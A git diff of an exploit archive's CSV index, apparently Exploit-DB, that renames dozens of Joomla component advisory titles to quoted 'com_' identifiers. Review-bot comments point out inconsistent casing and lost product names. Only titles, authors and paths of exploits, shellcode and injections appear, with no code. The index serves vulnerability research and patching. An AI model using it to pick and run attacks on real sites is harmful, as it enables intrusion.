diff --git a/files.csv b/files.csv
index 9ccadff5f..1ae0e3ea7 100755
--- a/files.csv
+++ b/files.csv
@@ -12735,9 +12735,9 @@ id,file,description,date,author,platform,type,port
 14492,platforms/windows/remote/14492.c,"Symantec Ams Intel Alert Handler Service - Design Flaw",2010-07-28,Spider,windows,remote,0
 14494,platforms/php/webapps/14494.txt,"AV Arcade 3 - Cookie SQL Injection Authentication Bypass",2010-07-28,saudi0hacker,php,webapps,0
 14495,platforms/php/webapps/14495.txt,"Joomla! Component PhotoMap Gallery 1.6.0 - Multiple Blind SQL Injections",2010-07-28,"Salvatore Fresta",php,webapps,0
-14499,platforms/php/webapps/14499.txt,"Joomla! Component PBBooking 1.0.4_3 - Multiple Blind SQL Injection",2010-07-29,"Salvatore Fresta",php,webapps,0
+14499,platforms/php/webapps/14499.txt,"Joomla! Component 'com_pbbooking' 1.0.4_3 - Multiple Blind SQL Injection",2010-07-29,"Salvatore Fresta",php,webapps,0
 14500,platforms/php/webapps/14500.txt,"Whizzy CMS 10.02 - Local File Inclusion",2010-07-29,"Anarchy Angel",php,webapps,0
-14501,platforms/php/webapps/14501.txt,"Joomla! Component SimpleShop (com_SimpleShop) - SQL Injection",2010-07-29,"UnD3rGr0unD W4rri0rZ",php,webapps,0
+14501,platforms/php/webapps/14501.txt,"Joomla! Component 'com_SimpleShop' - SQL Injection",2010-07-29,"UnD3rGr0unD W4rri0rZ",php,webapps,0
 14502,platforms/php/webapps/14502.txt,"Joomla! Component com_beamospetition - SQL Injection",2010-07-29,Forza-Dz,php,webapps,0
 14503,platforms/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 - Buffer Overflow (SEH)",2010-07-29,Madjix,windows,local,0
 14504,platforms/windows/dos/14504.html,"Barcodewiz BarCode ActiveX 3.29 - (PoC)",2010-07-30,loneferret,windows,dos,0
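Review bot: The quoted identifiers are not cased consistently: `'com_SimpleShop'` on the 14501 row in this hunk (and `'com_Fabrik'` on the 14707 row in the `@@ -12876` hunk) keep their capitals, while every other rewritten row uses an all-lower-case `com_` name. If the quoted token is meant to be the component's identifier, presumably lower case, I would write `'com_simpleshop'` and `'com_fabrik'`, so that a case-sensitive lookup by identifier does not skip these two advisories.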
@@ -12748,13 +12748,13 @@ id,file,description,date,author,platform,type,port
 14527,platforms/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Buffer Overflow (1)",2010-08-02,s-dz,windows,local,0
 14515,platforms/windows/dos/14515.pl,"Xmyplay 3.5.1 - Denial of Service",2010-07-31,s-dz,windows,dos,0
 14517,platforms/windows/dos/14517.pl,"Xion Audio Player 1.0.125 - Denial of Service",2010-07-31,s-dz,windows,dos,0
-14518,platforms/php/webapps/14518.txt,"Joomla! Component Spielothek 1.6.9 - Multiple Blind SQL Injection",2010-07-31,"Salvatore Fresta",php,webapps,0
+14518,platforms/php/webapps/14518.txt,"Joomla! Component 'com_spielothek' 1.6.9 - Multiple Blind SQL Injection",2010-07-31,"Salvatore Fresta",php,webapps,0
 14519,platforms/windows/remote/14519.html,"Barcodewiz Barcode ActiveX Control 3.29 - Remote Heap Spray Exploit (Internet Explorer 6/7)",2010-07-31,Dr_IDE,windows,remote,0
 14521,platforms/hardware/webapps/14521.txt,"Intellinet IP Camera MNC-L10 - Authentication Bypass",2010-08-01,Magnefikko,hardware,webapps,0
 14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass (Metasploit)",2010-08-01,"Ben Schmidt",windows,remote,0
 14523,platforms/php/webapps/14523.txt,"SnoGrafx - 'cat.php?cat' SQL Injection",2010-08-02,CoBRa_21,php,webapps,0
 14528,platforms/php/webapps/14528.txt,"APT-WEBSHOP-SYSTEM - modules.php SQL Injection",2010-08-02,secret,php,webapps,0
-14530,platforms/php/webapps/14530.txt,"Joomla! Component CamelcityDB 2.2 - SQL Injection",2010-08-02,Amine_92,php,webapps,0
+14530,platforms/php/webapps/14530.txt,"Joomla! Component 'com_camelcitydb2' 2.2 - SQL Injection",2010-08-02,Amine_92,php,webapps,0
 14531,platforms/php/webapps/14531.pdf,"MyIT CRM - Multiple Cross-Site Scripting",2010-08-02,"Juan Manuel Garcia",php,webapps,0
 14532,platforms/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Cnvrtr - Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",windows,local,0
 14533,platforms/windows/dos/14533.txt,"Avast! Internet Security 5.0 - 'aswFW.sys' Kernel Driver IOCTL Memory Pool Corruption",2010-08-03,x90c,windows,dos,0
@@ -12777,14 +12777,14 @@ id,file,description,date,author,platform,type,port
 14556,platforms/php/webapps/14556.txt,"Nuked-klaN Module Partenaires NK 1.5 - Blind SQL Injection",2010-08-05,Metropolis,php,webapps,0
 14559,platforms/php/webapps/14559.txt,"APBoard 2.1.0 - 'board.php?id=' SQL Injection",2010-08-05,secret,php,webapps,0
 14560,platforms/php/webapps/14560.txt,"ccTiddly 1.7.6 - Multiple Remote File Inclusion",2010-08-05,eidelweiss,php,webapps,0
-14569,platforms/php/webapps/14569.txt,"Joomla! Component cgtestimonial 2.2 - Multiple Vulnerabilities",2010-08-06,"Salvatore Fresta",php,webapps,0
+14569,platforms/php/webapps/14569.txt,"Joomla! Component 'com_cgtestimonial' 2.2 - Multiple Vulnerabilities",2010-08-06,"Salvatore Fresta",php,webapps,0
 14562,platforms/php/webapps/14562.html,"Open Blog 1.2.1 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps,0
 14563,platforms/php/webapps/14563.html,"BXR 0.6.8 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps,0
 14564,platforms/php/webapps/14564.html,"Amethyst 0.1.5 - Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0
 14565,platforms/php/webapps/14565.html,"DiamondList 0.1.6 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps,0
 14576,platforms/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",windows,local,0
 14573,platforms/linux/dos/14573.txt,"LibTIFF - 'td_stripbytecount' Null Pointer Dereference Remote Denial of Service",2010-08-07,"Tomas Hoger",linux,dos,0
-14570,platforms/php/webapps/14570.txt,"Joomla! Component com_neorecruit 1.4 - SQL Injection",2010-08-07,v3n0m,php,webapps,0
+14570,platforms/php/webapps/14570.txt,"Joomla! Component 'com_neorecruit' 1.4 - SQL Injection",2010-08-07,v3n0m,php,webapps,0
 14572,platforms/php/webapps/14572.txt,"Tycoon CMS Record Script 1.0.9 - SQL Injection",2010-08-07,Silic0n,php,webapps,0
 14578,platforms/php/webapps/14578.php,"PHPKick 0.8 - Statistics.php SQL Injection",2010-08-08,garwga,php,webapps,0
 14580,platforms/windows/remote/14580.html,"Advanced File Vault - 'eSellerateControl350.dll' ActiveX Heap Spray",2010-08-08,"ThE g0bL!N",windows,remote,0
@@ -12794,14 +12794,14 @@ id,file,description,date,author,platform,type,port
 14584,platforms/windows/dos/14584.py,"QQ Computer Manager - 'TSKsp.sys' Local Denial of Service",2010-08-09,"Lufeng Li",windows,dos,0
 14585,platforms/php/webapps/14585.php,"kleeja 1.0.0RC6 - Database Disclosure",2010-08-09,indoushka,php,webapps,0
 14586,platforms/windows/remote/14586.html,"dBpowerAMP Audio Player 2 - (FileExists) ActiveX Buffer Overflow",2010-08-09,s-dz,windows,remote,0
-14598,platforms/php/webapps/14598.txt,"Joomla! Component Teams - Multiple Blind SQL Injection",2010-08-10,"Salvatore Fresta",php,webapps,0
+14598,platforms/php/webapps/14598.txt,"Joomla! Component 'com_teams' - Multiple Blind SQL Injection",2010-08-10,"Salvatore Fresta",php,webapps,0
 14591,platforms/windows/local/14591.py,"Fat Player 0.6b - WAV File Processing Buffer Overflow (SEH)",2010-08-09,"Praveen Darshanam",windows,local,0
 14589,platforms/php/webapps/14589.txt,"PHP-Nuke 8.x.x - Blind SQL Injection",2010-08-09,ITSecTeam,php,webapps,0
-14592,platforms/php/webapps/14592.txt,"Joomla! Component Yellowpages - SQL Injection",2010-08-09,"al bayraqim",php,webapps,0
+14592,platforms/php/webapps/14592.txt,"Joomla! Component 'com_yellowpages' - SQL Injection",2010-08-09,"al bayraqim",php,webapps,0
 14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH)",2010-08-09,s-dz,windows,dos,0
 14594,platforms/linux/dos/14594.py,"Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service",2010-08-09,"Jon Oberheide",linux,dos,0
 14595,platforms/php/webapps/14595.html,"wizmall 6.4 - Cross-Site Request Forgery",2010-08-09,pyw1414,php,webapps,0
-14596,platforms/php/webapps/14596.txt,"Joomla! Component Amblog 1.0 - Multiple SQL Injections",2010-08-10,"Salvatore Fresta",php,webapps,0
+14596,platforms/php/webapps/14596.txt,"Joomla! Component 'com_amblog' 1.0 - Multiple SQL Injections",2010-08-10,"Salvatore Fresta",php,webapps,0
 14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder - Denial of Service",2010-08-10,"Oh Yaw Theng",windows,dos,0
 14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor - Remote ActiveX SEH JIT Spray Exploit (ASLR + DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0
 14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote Exploit",2010-08-10,sud0,windows,remote,0
@@ -12849,9 +12849,9 @@ id,file,description,date,author,platform,type,port
 14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 - Buffer Overflow (SEH) (2)",2010-08-15,dijital1,windows,local,0
 14650,platforms/php/webapps/14650.html,"Zomplog CMS 3.9 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0
 14654,platforms/php/webapps/14654.php,"CMSQLite 1.2 / CMySQLite 1.3.1 - Remote Code Execution",2010-08-15,BlackHawk,php,webapps,0
-14655,platforms/php/webapps/14655.txt,"Joomla! Component com_equipment - SQL Injection",2010-08-16,Forza-Dz,php,webapps,0
-14656,platforms/php/webapps/14656.txt,"Joomla! Component Jgrid 1.0 - Local File Inclusion",2010-08-16,"Salvatore Fresta",php,webapps,0
-14659,platforms/php/webapps/14659.txt,"Joomla! Component OnGallery - SQL Injection",2010-08-16,"al bayraqim",php,webapps,0
+14655,platforms/php/webapps/14655.txt,"Joomla! Component 'com_equipment' - SQL Injection",2010-08-16,Forza-Dz,php,webapps,0
+14656,platforms/php/webapps/14656.txt,"Joomla! Component 'com_jgrid' 1.0 - Local File Inclusion",2010-08-16,"Salvatore Fresta",php,webapps,0
+14659,platforms/php/webapps/14659.txt,"Joomla! Component 'com_ongallery' - SQL Injection",2010-08-16,"al bayraqim",php,webapps,0
 14666,platforms/windows/dos/14666.txt,"Microsoft Windows - nt!NtCreateThread Race Condition with Invalid Code Segment (MS10-047)",2010-08-17,"Tavis Ormandy",windows,dos,0
 14663,platforms/windows/local/14663.py,"MUSE 4.9.0.006 - '.m3u' Local Buffer Overflow",2010-08-16,"Glafkos Charalambous ",windows,local,0
 14664,platforms/windows/local/14664.py,"MUSE 4.9.0.006 - '.pls' Local Universal Buffer Overflow (SEH)",2010-08-16,"Glafkos Charalambous ",windows,local,0
@@ -12876,14 +12876,14 @@ id,file,description,date,author,platform,type,port
 14690,platforms/windows/dos/14690.pl,"Fennec 1.2 Beta 3 - Denial of Service",2010-08-19,d4rk-h4ck3r,windows,dos,0
 14691,platforms/lin_x86/shellcode/14691.c,"Linux/x86 - /bin/sh Polymorphic Null Free Shellcode (46 bytes)",2010-08-19,Aodrulez,lin_x86,shellcode,0
 14693,platforms/windows/local/14693.py,"Microsoft Word - Record Parsing Buffer Overflow (MS09-027)",2010-08-20,anonymous,windows,local,0
-14707,platforms/php/webapps/14707.txt,"Joomla! Component com_Fabrik - SQL Injection",2010-08-21,Mkr0x,php,webapps,0
-14694,platforms/php/webapps/14694.txt,"Joomla! Component com_extcalendar - Blind SQL Injection",2010-08-20,Lagripe-Dz,php,webapps,0
+14707,platforms/php/webapps/14707.txt,"Joomla! Component 'com_Fabrik' - SQL Injection",2010-08-21,Mkr0x,php,webapps,0
+14694,platforms/php/webapps/14694.txt,"Joomla! Component 'com_extcalendar' - Blind SQL Injection",2010-08-20,Lagripe-Dz,php,webapps,0
 14695,platforms/windows/dos/14695.pl,"Karaoke Video Creator 2.2.8 - Denial of Service",2010-08-20,PASSEWORD,windows,dos,0
 14697,platforms/windows/shellcode/14697.c,"Windows XP SP3 English - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous ",windows,shellcode,0
 14698,platforms/windows/dos/14698.py,"AV Music Morpher Gold 5.0.38 - '.m3u' Denial of Service",2010-08-20,b0telh0,windows,dos,0
 14699,platforms/windows/dos/14699.py,"PlayPad Music Player 1.12 - '.mp3' Denial of Service",2010-08-20,"Praveen Darshanam",windows,dos,0
-14702,platforms/php/webapps/14702.txt,"Joomla! Component com_zina - SQL Injection",2010-08-21,"Th3 RDX",php,webapps,0
-14703,platforms/php/webapps/14703.txt,"Joomla! Component Biblioteca 1.0 Beta - Multiple SQL Injections",2010-08-21,"Salvatore Fresta",php,webapps,0
+14702,platforms/php/webapps/14702.txt,"Joomla! Component 'com_zina' - SQL Injection",2010-08-21,"Th3 RDX",php,webapps,0
+14703,platforms/php/webapps/14703.txt,"Joomla! Component 'com_biblioteca' 1.0 Beta - Multiple SQL Injections",2010-08-21,"Salvatore Fresta",php,webapps,0
 14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script - SQL Injection",2010-08-21,"Br0wn Sug4r",asp,webapps,0
 14705,platforms/windows/dos/14705.c,"Microsoft Windows - (IcmpSendEcho2Ex Interrupting) Denial of Service",2010-08-21,l3D,windows,dos,0
 14706,platforms/windows/local/14706.py,"Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0
@@ -12894,7 +12894,7 @@ id,file,description,date,author,platform,type,port
 14714,platforms/php/webapps/14714.txt,"Ananta Gazelle CMS - Multiple Vulnerabilities",2010-08-23,Sweet,php,webapps,0
 14716,platforms/php/webapps/14716.txt,"AneCMS - /registre/next SQL Injection",2010-08-23,Sweet,php,webapps,0
 14717,platforms/php/webapps/14717.txt,"Link CMS - SQL Injection",2010-08-23,hacker@sr.gov.yu,php,webapps,0
-14718,platforms/php/webapps/14718.txt,"Joomla! Component com_zoomportfolio - SQL Injection",2010-08-23,"Chip d3 bi0s",php,webapps,0
+14718,platforms/php/webapps/14718.txt,"Joomla! Component 'com_zoomportfolio' - SQL Injection",2010-08-23,"Chip d3 bi0s",php,webapps,0
 14720,platforms/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Buffer Overflow",2010-08-23,"James Fitts",windows,local,0
 14721,platforms/windows/local/14721.c,"Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0
 14722,platforms/php/webapps/14722.txt,"Joomla! 1.5 - URL Redirecting",2010-08-24,Mr.MLL,php,webapps,0
@@ -12963,7 +12963,7 @@ id,file,description,date,author,platform,type,port
 14799,platforms/php/webapps/14799.txt,"osCommerce Online Merchant - Remote File Inclusion",2010-08-26,LoSt.HaCkEr,php,webapps,0
 14801,platforms/php/webapps/14801.txt,"Atomic Photo Album 1.0.2 - Multiple Vulnerabilities",2010-08-26,sh00t0ut,php,webapps,0
 14802,platforms/php/webapps/14802.html,"Hycus CMS 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-26,10n1z3d,php,webapps,0
-14811,platforms/php/webapps/14811.txt,"Joomla! Component com_remository - Arbitrary File Upload",2010-08-26,J3yk0ob,php,webapps,0
+14811,platforms/php/webapps/14811.txt,"Joomla! Component 'com_remository' - Arbitrary File Upload",2010-08-26,J3yk0ob,php,webapps,0
 14808,platforms/php/webapps/14808.pl,"Mini-CMS / News Script Light 1.0 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0
 14809,platforms/php/webapps/14809.txt,"kontakt formular 1.1 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0
 14810,platforms/php/webapps/14810.txt,"Gaestebuch 1.2 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0
@@ -12990,8 +12990,8 @@ id,file,description,date,author,platform,type,port
 14840,platforms/windows/dos/14840.py,"Mereo 1.9.2 - Remote HTTP Server Denial of Service",2010-08-30,"CwG GeNiuS",windows,dos,0
 14841,platforms/php/webapps/14841.txt,"seagull 0.6.7 - Remote File Inclusion",2010-08-30,"FoX HaCkEr",php,webapps,0
 14843,platforms/windows/dos/14843.txt,"Apple QuickTime - '_Marshaled_pUnk' Backdoor Parameter Client-Side Arbitrary Code Execution",2010-08-30,"Ruben Santamarta ",windows,dos,0
-14845,platforms/php/webapps/14845.txt,"Joomla! Component com_picsell - Local File Disclosure",2010-08-30,Craw,php,webapps,0
-14846,platforms/php/webapps/14846.txt,"Joomla! Component com_jefaqpro - Multiple Blind SQL Injection",2010-08-31,"Chip d3 bi0s",php,webapps,0
+14845,platforms/php/webapps/14845.txt,"Joomla! Component 'com_picsell' - Local File Disclosure",2010-08-30,Craw,php,webapps,0
+14846,platforms/php/webapps/14846.txt,"Joomla! Component 'com_jefaqpro' - Multiple Blind SQL Injection",2010-08-31,"Chip d3 bi0s",php,webapps,0
 14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 - (viewpost.php) SQL Injection",2010-08-31,"Ptrace Security",php,webapps,0
 14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass",2010-09-01,Abysssec,php,webapps,0
 14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion",2010-09-01,Andre_Corleone,php,webapps,0
@@ -13022,24 +13022,24 @@ id,file,description,date,author,platform,type,port
 14893,platforms/php/webapps/14893.txt,"PHP Classifieds 7.3 - Remote File Inclusion",2010-09-04,alsa7r,php,webapps,0
 14894,platforms/php/webapps/14894.py,"A-Blog 2.0 - 'sources/search.php' SQL Injection",2010-09-05,"Ptrace Security",php,webapps,0
 14895,platforms/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution",2010-09-05,Abysssec,windows,remote,0
-14896,platforms/php/webapps/14896.txt,"Joomla! Component iJoomla! magazine 3.0.1 - Remote File Inclusion",2010-09-05,LoSt.HaCkEr,php,webapps,0
+14896,platforms/php/webapps/14896.txt,"Joomla! Component 'com_magazine' 3.0.1 - Remote File Inclusion",2010-09-05,LoSt.HaCkEr,php,webapps,0
 14897,platforms/php/webapps/14897.txt,"ChillyCMS 1.1.3 - Multiple Vulnerabilities",2010-09-05,"AmnPardaz ",php,webapps,0
 14898,platforms/asp/webapps/14898.txt,"ifnuke - Multiple Vulnerabilities",2010-09-05,Abysssec,asp,webapps,0
-14901,platforms/php/webapps/14901.txt,"Joomla! Component Clantools 1.5 - Blind SQL Injection",2010-09-05,Solidmedia,php,webapps,0
-14902,platforms/php/webapps/14902.txt,"Joomla! Component Clantools 1.2.3 - Multiple Blind SQL Injection",2010-09-05,Solidmedia,php,webapps,0
+14901,platforms/php/webapps/14901.txt,"Joomla! Component 'com_clantools' 1.5 - Blind SQL Injection",2010-09-05,Solidmedia,php,webapps,0
+14902,platforms/php/webapps/14902.txt,"Joomla! Component 'com_clantools' 1.2.3 - Multiple Blind SQL Injection",2010-09-05,Solidmedia,php,webapps,0
 14904,platforms/linux/dos/14904.txt,"FCrackZip 1.0 - Local Buffer Overflow (PoC)",2010-09-05,0x6264,linux,dos,0
 14913,platforms/asp/webapps/14913.txt,"DMXReady Members Area Manager - Persistent Cross-Site Scripting",2010-09-06,"L0rd CrusAd3r",asp,webapps,0
 14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",arm,shellcode,0
 14908,platforms/asp/webapps/14908.txt,"DMXready Polling Booth Manager - SQL Injection",2010-09-05,"L0rd CrusAd3r",asp,webapps,0
 14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - Buffer Overflow (SEH) Crash (PoC)",2010-09-05,"Abhishek Lyall",windows,dos,0
 14910,platforms/php/webapps/14910.txt,"Softbiz Article Directory Script - (sbiz_id) Blind SQL Injection",2010-09-05,"BorN To K!LL",php,webapps,0
-14911,platforms/php/webapps/14911.sh,"Joomla! Component Gantry Framework 3.0.10 - Blind SQL Injection",2010-09-05,jdc,php,webapps,0
+14911,platforms/php/webapps/14911.sh,"Joomla! Component 'com_gantry' 3.0.10 - Blind SQL Injection",2010-09-05,jdc,php,webapps,0
 14932,platforms/windows/webapps/14932.py,"ColdCalendar 2.06 - SQL Injection",2010-09-07,mr_me,windows,webapps,0
 14914,platforms/asp/webapps/14914.txt,"Micronetsoft RV Dealer Website - SQL Injection",2010-09-06,"L0rd CrusAd3r",asp,webapps,0
 14915,platforms/php/webapps/14915.txt,"InterPhoto Gallery - Multiple Vulnerabilities",2010-09-06,Abysssec,php,webapps,0
 14916,platforms/windows/dos/14916.py,"HP OpenView Network Node Manager (OV NNM) - webappmon.exe execvp_nc Remote Code Execution",2010-09-06,Abysssec,windows,dos,0
 14919,platforms/asp/webapps/14919.txt,"Micronetsoft Rental Property Management Website - SQL Injection",2010-09-06,"L0rd CrusAd3r",asp,webapps,0
-14922,platforms/php/webapps/14922.txt,"Joomla! Component Aardvertiser 2.1 Free - Blind SQL Injection",2010-09-06,"Stephan Sattler",php,webapps,0
+14922,platforms/php/webapps/14922.txt,"Joomla! Component 'com_aardvertiser' 2.1 - Blind SQL Injection",2010-09-06,"Stephan Sattler",php,webapps,0
 14923,platforms/php/webapps/14923.txt,"WordPress Plugin Events Manager Extended - Persistent Cross-Site Scripting",2010-09-06,Craw,php,webapps,0
 14931,platforms/php/webapps/14931.php,"java Bridge 5.5 - Directory Traversal",2010-09-07,Saxtor,php,webapps,0
 14925,platforms/linux/remote/14925.txt,"weborf 0.12.2 - Directory Traversal",2010-09-07,Rew,linux,remote,0
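Review bot: Replacing the product name with the `com_` identifier drops the name an administrator is most likely to know the extension by: in this hunk `iJoomla! magazine` becomes `'com_magazine'`, `Gantry Framework` becomes `'com_gantry'`, and the 14922 row also loses its `Free` edition qualifier. The same happens in later hunks with `RSform!` → `'com_forme'` (15443), `Mosets Tree` → `'com_mtree'` (14995), `Community Builder Enhenced (CBE)` → `'com_cbe'` (15222) and the JE, Flip Wall and Sponsor Wall rows. Anyone checking an installed-extension inventory against this index by product name, presumably with a text search over the description column, would no longer find these advisories. I would keep both forms, e.g. `"Joomla! Component iJoomla! magazine 'com_magazine' 3.0.1 - Remote File Inclusion"`, and keep `2.1 Free` on 14922 unless the edition was known to be wrong.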
@@ -13060,12 +13060,12 @@ id,file,description,date,author,platform,type,port
 14954,platforms/asp/webapps/14954.txt,"aradblog - Multiple Vulnerabilities",2010-09-09,Abysssec,asp,webapps,0
 14966,platforms/windows/local/14966.py,"Excel RTD - Memory Corruption",2010-09-10,Abysssec,windows,local,0
 15442,platforms/php/webapps/15442.txt,"Zeeways Adserver - Multiple Vulnerabilities",2010-11-06,Valentin,php,webapps,0
-15443,platforms/php/webapps/15443.txt,"Joomla! Component RSform! 1.0.5 - Multiple Vulnerabilities",2010-11-06,jdc,php,webapps,0
+15443,platforms/php/webapps/15443.txt,"Joomla! Component 'com_forme' 1.0.5 - Multiple Vulnerabilities",2010-11-06,jdc,php,webapps,0
 14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended M3U directives SEH Exploit",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0
 14960,platforms/php/webapps/14960.txt,"ES Simple Download 1.0. - Local File Inclusion",2010-09-09,Kazza,php,webapps,0
 14961,platforms/win_x86/local/14961.py,"Audiotran 1.4.2.4 - SEH Overflow",2010-09-09,"Abhishek Lyall",win_x86,local,0
 14962,platforms/multiple/webapps/14962.txt,"CS-Cart 1.3.3 - 'install.php' Cross-Site Scripting",2010-09-09,crmpays,multiple,webapps,80
-14964,platforms/php/webapps/14964.txt,"Joomla! Component com_jphone - Local File Inclusion",2010-09-10,"Chip d3 bi0s",php,webapps,0
+14964,platforms/php/webapps/14964.txt,"Joomla! Component 'com_jphone' - Local File Inclusion",2010-09-10,"Chip d3 bi0s",php,webapps,0
 14965,platforms/php/webapps/14965.txt,"fcms 2.2.3 - Remote File Inclusion",2010-09-10,LoSt.HaCkEr,php,webapps,0
 14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0
 14968,platforms/php/webapps/14968.txt,"symphony 2.0.7 - Multiple Vulnerabilities",2010-09-10,JosS,php,webapps,0
@@ -13086,10 +13086,10 @@ id,file,description,date,author,platform,type,port
 14990,platforms/windows/dos/14990.txt,"AA SMTP Server 1.1 - Crash (PoC)",2010-09-13,SONIC,windows,dos,0
 14991,platforms/asp/webapps/14991.txt,"Luftguitar CMS - Upload Arbitrary File",2010-09-13,Abysssec,asp,webapps,0
 14992,platforms/windows/dos/14992.py,"RealPlayer - FLV Parsing Integer Overflow",2010-09-13,Abysssec,windows,dos,0
-14995,platforms/php/webapps/14995.txt,"Joomla! Component Mosets Tree 2.1.5 - Arbitrary File Upload",2010-09-13,jdc,php,webapps,0
+14995,platforms/php/webapps/14995.txt,"Joomla! Component 'com_mtree' 2.1.5 - Arbitrary File Upload",2010-09-13,jdc,php,webapps,0
 14996,platforms/php/webapps/14996.txt,"Storyteller CMS - (var) Local File Inclusion",2010-09-13,"BorN To K!LL",php,webapps,0
 14997,platforms/php/webapps/14997.txt,"UCenter Home 2.0 - SQL Injection",2010-09-13,KnocKout,php,webapps,0
-14998,platforms/php/webapps/14998.txt,"Joomla! Component com_jgen - SQL Injection",2010-09-14,**RoAd_KiLlEr**,php,webapps,0
+14998,platforms/php/webapps/14998.txt,"Joomla! Component 'com_jgen' - SQL Injection",2010-09-14,**RoAd_KiLlEr**,php,webapps,0
 14999,platforms/asp/webapps/14999.txt,"freediscussionforums 1.0 - Multiple Vulnerabilities",2010-09-14,Abysssec,asp,webapps,0
 15001,platforms/windows/remote/15001.html,"Novell iPrint Client Browser Plugin - ExecuteRequest debug Stack Overflow",2010-09-14,Abysssec,windows,remote,0
 15042,platforms/windows/remote/15042.py,"Novell iPrint Client Browser Plugin - call-back-url Stack Overflow",2010-09-19,Abysssec,windows,remote,0
@@ -13119,7 +13119,7 @@ id,file,description,date,author,platform,type,port
 15035,platforms/windows/dos/15035.py,"Apple QuickTime FLI LinePacket - Remote Code Execution",2010-09-18,Abysssec,windows,dos,0
 15037,platforms/php/webapps/15037.html,"CMSimple - Cross-Site Request Forgery",2010-09-18,Abysssec,php,webapps,0
 15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 < 2010 - 'reviews.php' Error-Based SQL Injection",2010-09-18,secret,php,webapps,0
-15040,platforms/php/webapps/15040.txt,"Joomla! Component com_restaurantguide - Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0
+15040,platforms/php/webapps/15040.txt,"Joomla! Component 'com_restaurantguide' - Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0
 15041,platforms/php/webapps/15041.py,"Maian Gallery 2 - Local File Download",2010-09-18,mr_me,php,webapps,0
 15044,platforms/asp/webapps/15044.txt,"jmd-cms - Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0
 15046,platforms/php/webapps/15046.txt,"Fashione E-Commerce Webshop - Multiple SQL Injections",2010-09-19,secret,php,webapps,0
@@ -13127,7 +13127,7 @@ id,file,description,date,author,platform,type,port
 15048,platforms/windows/remote/15048.txt,"SmarterMail 7.1.3876 - Directory Traversal",2010-09-19,sqlhacker,windows,remote,0
 15049,platforms/php/webapps/15049.txt,"BoutikOne 1.0 - SQL Injection",2010-09-19,BrOx-Dz,php,webapps,0
 15050,platforms/php/webapps/15050.txt,"Opencart 1.4.9.1 - Arbitrary File Upload",2010-09-19,Net.Edit0r,php,webapps,0
-15100,platforms/win_x86/webapps/15100.txt,"Joomla! Component com_elite_experts - SQL Injection",2010-09-24,**RoAd_KiLlEr**,win_x86,webapps,80
+15100,platforms/win_x86/webapps/15100.txt,"Joomla! Component 'com_elite_experts' - SQL Injection",2010-09-24,**RoAd_KiLlEr**,win_x86,webapps,80
 15099,platforms/windows/local/15099.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH)",2010-09-24,"James Fitts",windows,local,0
 15054,platforms/linux/dos/15054.rb,"RarCrack 0.2 - Buffer Overflow (PoC)",2010-09-19,The_UnKn@wn,linux,dos,0
 15056,platforms/windows/remote/15056.py,"Java 6.19 CMM readMabCurveData - Stack Overflow",2010-09-20,Abysssec,windows,remote,0
@@ -13151,8 +13151,8 @@ id,file,description,date,author,platform,type,port
 15080,platforms/php/webapps/15080.txt,"Skybluecanvas 1.1-r248 - Cross-Site Request Forgery",2010-09-22,Sweet,php,webapps,0
 15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - SEH Exploit (Metasploit)",2010-09-22,Madjix,windows,local,0
 15082,platforms/php/webapps/15082.txt,"BSI Hotel Booking System Admin 1.4/2.0 - Login Bypass",2010-09-22,K-159,php,webapps,0
-15084,platforms/php/webapps/15084.txt,"Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injection",2010-09-22,"Salvatore Fresta",php,webapps,0
